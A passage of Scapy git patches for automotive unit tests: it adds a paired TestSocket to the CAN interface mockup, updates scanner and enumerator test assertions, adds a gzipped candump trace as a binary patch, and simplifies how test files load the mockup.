241#2200000000000000 -(4920.801000) vcan2 241#230A000000000000 -(4925.808000) vcan2 241#2406000000000000 -(4930.812000) vcan2 241#25EC000000000000 -(4935.812000) vcan2 241#2600000000000000 -(4940.803000) vcan2 241#27CB000000000000 -(4940.982000) vcan2 641#0176 -(4951.645000) vcan2 241#063680FEDF100001 diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 09ebcdaeafe..ad95ec513e6 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -9,12 +9,20 @@ import os import subprocess import sys +import time from platform import python_implementation -from scapy.all import load_layer, load_contrib, conf, log_runtime +from scapy.main import load_layer, load_contrib +from scapy.config import conf +from scapy.error import log_runtime, Scapy_Exception, warning import scapy.modules.six as six from scapy.consts import LINUX +from scapy.automaton import ObjectPipe +from scapy.data import MTU +from scapy.packet import Packet +from scapy.compat import Optional, Type, Tuple, Any +from scapy.supersocket import SuperSocket load_layer("can", globals_dict=globals()) conf.contribs['CAN']['swap-bytes'] = False @@ -35,6 +43,7 @@ def test_and_setup_socket_can(iface_name): + # type: (str) -> None if 0 != subprocess.call(("cansend %s 000#" % iface_name).split()): # iface_name is not enabled if 0 != subprocess.call("modprobe vcan".split()): @@ -68,7 +77,7 @@ def test_and_setup_socket_can(iface_name): # ############################################################################ if _socket_can_support: if six.PY3: - from scapy.contrib.cansocket_native import * + from scapy.contrib.cansocket_native import * # noqa: F403 new_can_socket = NativeCANSocket new_can_socket0 = lambda: NativeCANSocket(iface0) new_can_socket1 = lambda: NativeCANSocket(iface1) @@ -76,18 +85,18 @@ def test_and_setup_socket_can(iface_name): sys.__stderr__.write("Using NativeCANSocket\n") else: - from scapy.contrib.cansocket_python_can import * - new_can_socket = lambda iface: PythonCANSocket(bustype='socketcan', channel=iface, timeout=0.01) - new_can_socket0 = lambda: PythonCANSocket(bustype='socketcan', channel=iface0, timeout=0.01) - new_can_socket1 = lambda: PythonCANSocket(bustype='socketcan', channel=iface1, timeout=0.01) + from scapy.contrib.cansocket_python_can import * # noqa: F403 + new_can_socket = lambda iface: PythonCANSocket(bustype='socketcan', channel=iface, timeout=0.01) # noqa: E501 + new_can_socket0 = lambda: PythonCANSocket(bustype='socketcan', channel=iface0, timeout=0.01) # noqa: E501 + new_can_socket1 = lambda: PythonCANSocket(bustype='socketcan', channel=iface1, timeout=0.01) # noqa: E501 can_socket_string_list = ["-i", "socketcan", "-c", iface0] sys.__stderr__.write("Using PythonCANSocket socketcan\n") else: - from scapy.contrib.cansocket_python_can import * - new_can_socket = lambda iface: PythonCANSocket(bustype='virtual', channel=iface) - new_can_socket0 = lambda: PythonCANSocket(bustype='virtual', channel=iface0, timeout=0.01) - new_can_socket1 = lambda: PythonCANSocket(bustype='virtual', channel=iface1, timeout=0.01) + from scapy.contrib.cansocket_python_can import * # noqa: F403 + new_can_socket = lambda iface: PythonCANSocket(bustype='virtual', channel=iface) # noqa: E501 + new_can_socket0 = lambda: PythonCANSocket(bustype='virtual', channel=iface0, timeout=0.01) # noqa: E501 + new_can_socket1 = lambda: PythonCANSocket(bustype='virtual', channel=iface1, timeout=0.01) # noqa: E501 sys.__stderr__.write("Using PythonCANSocket virtual\n") @@ -104,6 +113,7 @@ def test_and_setup_socket_can(iface_name): def cleanup_interfaces(): + # type: () -> bool """ Helper function to remove virtual CAN interfaces after test @@ -124,6 +134,7 @@ def cleanup_interfaces(): def drain_bus(iface=iface0, assert_empty=True): + # type: (str, bool) -> None """ Utility function for draining a can interface, asserting that no packets are there @@ -154,6 +165,7 @@ def drain_bus(iface=iface0, assert_empty=True): def exit_if_no_isotp_module(): + # type: () -> None """ Helper function to exit a test case if ISOTP kernel module is not available """ @@ -192,20 +204,81 @@ def exit_if_no_isotp_module(): if six.PY3: import importlib if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) + importlib.reload(scapy.contrib.isotp) # type: ignore # noqa: F405 load_contrib("isotp", globals_dict=globals()) if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: - if not ISOTPSocket == ISOTPNativeSocket: + if ISOTPSocket is not ISOTPNativeSocket: # type: ignore raise Scapy_Exception("Error in ISOTPSocket import!") else: - if not ISOTPSocket == ISOTPSoftSocket: + if ISOTPSocket is not ISOTPSoftSocket: # type: ignore raise Scapy_Exception("Error in ISOTPSocket import!") # ############################################################################ # """ Prepare send_delay on Ecu Answering Machine to stabilize unit tests """ # ############################################################################ -from scapy.contrib.automotive.ecu import * +from scapy.contrib.automotive.ecu import * # noqa: F403 log_runtime.debug("Set send delay to lower utilization on CI machines") conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 + +# ############################################################################ +# """ Define custom SuperSocket for unit tests """ +# ############################################################################ + + +class TestSocket(ObjectPipe, object): + nonblocking_socket = True # type: bool + + def __init__(self, basecls=None): + # type: (Optional[Type[Packet]]) -> None + super(TestSocket, self).__init__() + self.basecls = basecls + self.__paired_socket = None # type: Optional[TestSocket] + self.closed = False + + def close(self): + self.closed = True + super(TestSocket, self).close() + + def pair(self, sock): + # type: (TestSocket) -> None + if sock.__paired_socket or self.__paired_socket: + raise Scapy_Exception("Socket already paired") + self.__paired_socket = sock + sock.__paired_socket = self + + def send(self, x): + # type: (Packet) -> int + if not self.__paired_socket: + self.close() + raise Scapy_Exception("Socket not paired!") + + sx = bytes(x) + super(TestSocket, self.__paired_socket).send(sx) + try: + x.sent_time = time.time() + except AttributeError: + pass + return len(sx) + + def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Returns a tuple containing (cls, pkt_data, time)""" + return self.basecls, \ + super(TestSocket, self).recv(), \ + time.time() + + def recv(self, x=MTU): + # type: (int) -> Optional[Packet] + if six.PY3: + return SuperSocket.recv(self, x) + else: + return SuperSocket.recv.im_func(self, x) + + def sr1(self, *args, **kargs): + # type: (Any, Any) -> Optional[Packet] + if six.PY3: + return SuperSocket.sr1(self, *args, **kargs) + else: + return SuperSocket.sr1.im_func(self, *args, **kargs) diff --git a/test/contrib/automotive/scanner/configuration.uts b/test/contrib/automotive/scanner/configuration.uts index 4ee959d09be..04074b7c297 100644 --- a/test/contrib/automotive/scanner/configuration.uts +++ b/test/contrib/automotive/scanner/configuration.uts @@ -121,6 +121,33 @@ assert len(config.staged_test_cases) == 2 assert config.verbose == False assert config.debug == False assert config.delay_state_change > 0 +assert config.staged_test_cases[0].__class__ == MyTestCase1 +assert config.staged_test_cases[1].__class__ == MyTestCase2 +assert config.stages[0].__class__ == StagedAutomotiveTestCase + += creation of config with stages class + +class myStagedTestCase(StagedAutomotiveTestCase): + def __init__(self): + # type: () -> None + super(myStagedTestCase, self).__init__( + [MyTestCase1(), MyTestCase2()], + None) + + +config = AutomotiveTestCaseExecutorConfiguration( + [MyTestCase2(), MyTestCase2, MyTestCase3, MyTestCase4, myStagedTestCase]) + +assert len(config.test_cases) == 5 +assert len(config.test_case_clss) == 5 +assert len(config.stages) == 1 +assert len(config.staged_test_cases) == 2 +assert config.staged_test_cases[0].__class__ == MyTestCase1 +assert config.staged_test_cases[1].__class__ == MyTestCase2 +assert config.stages[0].__class__ == myStagedTestCase +assert config.verbose == False +assert config.debug == False +assert config.delay_state_change > 0 diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index d2d54b3ce8f..76ee1e70d25 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -163,15 +163,15 @@ assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) conf = {"exit_if_service_not_supported": False, "retry_if_busy_returncode": True} -assert e._retry_pkt == None +assert e._retry_pkt[EcuState(session=1)] == None assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x10"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x11"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x7f"), **conf) -assert e._retry_pkt == None +assert e._retry_pkt[EcuState(session=1)] == None assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) -assert e._retry_pkt == UDS(b"\x10\x03abcd") +assert e._retry_pkt[EcuState(session=1)] == UDS(b"\x10\x03abcd") assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x7f\x10\x21"), **conf) -assert e._retry_pkt == None +assert e._retry_pkt[EcuState(session=1)] == None assert True == e._evaluate_response(EcuState(session=1), UDS(b"\x10\x03abcd"), UDS(b"\x50\x03\x00"), **conf) assert False == e._evaluate_response(EcuState(session=1), UDS(b"\x11\x03abcd"), UDS(b"\x51\x03\x00"), **conf) @@ -256,14 +256,14 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), exit_if_service_not_supported=True) -assert e._retry_pkt is None +assert e._retry_pkt[EcuState(session=1)] is None assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert e.completed e.execute(sock, EcuState(session=2), exit_if_service_not_supported=True) -assert e._retry_pkt is None +assert e._retry_pkt[EcuState(session=2)] is None assert len(e.results_with_response) == 2 assert len(e.results_with_negative_response) == 2 assert e.completed @@ -277,7 +277,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1)) -assert e._retry_pkt is not None +assert e._retry_pkt[EcuState(session=1)] is not None assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 0 @@ -285,7 +285,7 @@ assert not e.completed e.execute(sock, EcuState(session=1)) -assert e._retry_pkt is None +assert e._retry_pkt[EcuState(session=1)] is None assert len(e.results_with_response) == 2 assert len(e.results_with_negative_response) == 2 assert len(e.results_without_response) == 9 @@ -300,7 +300,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), retry_if_busy_returncode=False) -assert e._retry_pkt is None +assert e._retry_pkt[EcuState(session=1)] is None assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 9 @@ -315,7 +315,7 @@ e = MyTestCase() e.execute(sock, EcuState(session=1), execution_time=-1) -assert e._retry_pkt is None +assert e._retry_pkt[EcuState(session=1)] is None assert len(e.results_with_response) == 1 assert len(e.results_with_negative_response) == 1 assert len(e.results_without_response) == 0 @@ -328,6 +328,7 @@ assert not e.has_completed(EcuState(session=1)) = Definitions class MockSock(object): + closed = False def sr1(self, *args, **kwargs): raise OSError @@ -478,7 +479,7 @@ assert tce.target_state == EcuState(session=1) = Reconnect Handler tests class MockSocket2: - pass + closed = False def reconnect_func(): return MockSocket2() @@ -496,12 +497,13 @@ assert isinstance(tce.socket._inner, MockSocket2) closed = False class MockSocket1: + closed = False def close(self): global closed closed = True class MockSocket2: - pass + closed = False def reconnect_func(): return MockSocket2() diff --git a/test/contrib/automotive/ecu_trace.pcap.gz b/test/pcaps/ecu_trace.pcap.gz similarity index 100% rename from test/contrib/automotive/ecu_trace.pcap.gz rename to test/pcaps/ecu_trace.pcap.gz diff --git a/test/pcaps/gmlan_trace.candump.gz b/test/pcaps/gmlan_trace.candump.gz new file mode 100755 index 0000000000000000000000000000000000000000..b9368dddc2fce03b2301b36175802d45e79a4d4e GIT binary patch literal 8063 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 N|3C9Mjf`lZ000{wkE{Ry literal 0 HcmV?d00001 From 47988343bb9e9ea0ef0476abd5d312314b4b2187 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 18 Aug 2021 20:33:39 +0200 Subject: [PATCH 0625/1632] Cleanup of interface_mockup import in automotive unit tests --- test/contrib/automotive/ccp.uts | 7 ++----- test/contrib/automotive/ecu_am.uts | 7 ++----- test/contrib/automotive/gm/gmlanutils.uts | 7 ++----- test/contrib/automotive/obd/scanner.uts | 7 ++----- test/contrib/automotive/uds_utils.uts | 7 ++----- test/contrib/automotive/xcp/xcp_comm.uts | 9 ++------- test/contrib/isotp.uts | 6 ++---- test/contrib/isotpscan.uts | 7 ++----- test/tools/isotpscanner.uts | 8 ++------ test/tools/obdscanner.uts | 8 ++------ test/tools/xcpscanner.uts | 7 ++----- 11 files changed, 22 insertions(+), 58 deletions(-) diff --git a/test/contrib/automotive/ccp.uts b/test/contrib/automotive/ccp.uts index e02cb7d35ba..76df1ae6d8f 100644 --- a/test/contrib/automotive/ccp.uts +++ b/test/contrib/automotive/ccp.uts @@ -4,12 +4,9 @@ ~ conf = Imports -import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ############ ############ diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 6c31ef9411e..6820f4b8aae 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -5,12 +5,9 @@ ~ conf = Imports -import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ############ diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 94f1b3707b9..8c8405e9ea8 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -6,12 +6,9 @@ = Imports -import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ############ ############ diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index f3deb13ec93..bfc0b267159 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -5,12 +5,9 @@ ~ conf = Imports -import scapy.modules.six as six -if six.PY3: - exec(open("test/contrib/automotive/interface_mockup.py").read()) -else: - execfile("test/contrib/automotive/interface_mockup.py") +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) ############ diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index a68983d1658..644f3afebac 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -5,12 +5,9 @@ ~ conf = Imports -import scapy.modules.six as six -if six.PY3: - 